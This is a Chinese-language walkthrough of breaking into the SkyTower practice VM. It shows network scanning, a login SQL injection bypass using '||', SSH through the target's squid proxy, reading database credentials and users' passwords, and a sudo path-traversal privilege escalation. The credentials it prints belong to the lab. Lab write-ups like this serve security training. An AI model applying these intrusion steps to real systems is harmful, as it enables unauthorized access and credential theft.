skytower靶机详细教学

一、主机发现

arp-scan -l

得知靶机ip为192.168.55.152

二、端口扫描、目录枚举、指纹识别

2.1端口扫描

nmap -p- 192.168.55.152

发现靶机具有特殊端口

2.2目录枚举

dirb http://192.168.55.152

访问敏感目录，发现apache版本信息

2.3指纹识别

三、访问靶机页面，拿到低权限用户

进入靶机页面，发现存在登陆框，可以尝试sql注入

抓包尝试进行sql注入，发现确实存在注入

使用万能密码查询，发现or和=都被过滤了

尝试使用||代替or

成功出了一组账号密码

john
hereisjohn

尝试使用了ssh进行连接，但是一直连不上，想到刚刚端口扫描时扫到了3128这个开启了squid-http代理服务的端口，尝试连接

这里使用kali的proxychains工具代理到3128这个端口

sudo vim /etc/proxychains4.conf
http 192.168.55.152 3128

proxychains ssh john@192.168.55.152 -t "/bin/sh"

拿到靶机的低权限shell

四、提权

首先进行靶机信息收集

uname -a

发现靶机版本找不到合适漏洞

发现靶机还存在其它用户

查看john用户下的文件

没有信息，去根目录和网站目录继续寻找信息

在网站根目录下找到了login.php，查看该文件找到了连接数据库的账号密码均为root

连接数据库，进入数据库查询其他用户的账号密码

mysql -u root -p

拿到其他用户的账号密码

尝试使用其他账号密码进行登陆

sara    ihatethisjob 
william   senseable 

发现sara账号可以登陆进去，进去之后发现sara账号可以使用root的cat和ls命令

sudo -l

在sara账号下寻找root用户的目录，然后找root用户的密码

# 查看根目录下有哪些文件
sudo ls /accounts/../
 
# 查看 /root 下的文件
sudo ls /accounts/../root
 
# 查看 flag 文件
sudo cat /accounts/../root/flag.txt

后续直接su提权即可

成功提取！